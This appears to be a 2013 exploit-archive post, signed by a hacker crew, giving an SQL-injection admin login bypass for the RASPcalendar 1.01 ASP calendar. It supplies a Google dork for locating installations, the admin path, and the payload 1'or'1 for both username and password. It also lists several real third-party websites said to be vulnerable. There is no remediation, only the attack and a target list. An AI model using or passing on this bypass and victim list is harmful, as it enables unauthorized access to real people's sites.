RASPcalendar 1.01 - [ASP] Admin Login Vlunerabilities


DATE: Nov. 24, 2013, 11:53 p.m.

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HITS: 1923

  1. ---------------------------------------------------
  2. RASPcalendar 1.01 [ASP] Admin Login Vlunerabilities
  3. ---------------------------------------------------
  4. Author : Hackeri-AL
  5. Date : 06-11-2013
  6. Vendor Homepage : http://www.rttucson.com/files.html
  7. Software link : http://www.rttucson.com/RASPcalendar.zip
  8. Verison : 1.01
  9. Tested On : Windows XP
  10. ------------------------------------------------------------
  11. Google Dork: allinurl:RASPcalendar "powered by RASPcalendar"
  12. ------------------------------------------------------------
  13. Example : http://www.usfim.it/RASPcalendar/
  14. : http://site.com/events
  15. : http://site.com/calendar
  16. : etc...
  17. Go to : http://www.usfim.it/RASPcalendar/admin/
  18. UserName : 1'or'1
  19. PassWord : 1'or'1
  20. Login Success Fully :D
  21. ------------------------------------------------------------
  22. Vuln sites demo :
  23. http://www.usfim.it/RASPcalendar/admin
  24. http://www.davemitchellassociates.com/events/admin
  25. http://www.bradandrebecca.com/Calendar/admin
  26. http://www.hlubline.com/pt/calendar/admin
  27. ------------------------------------------------------------
  28. Found By Hackeri-AL , UAH-Crew Group 2009-2013
  29. UNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~
  30. [~] Legends Of Albania
  31. ------------------------------------------------------------

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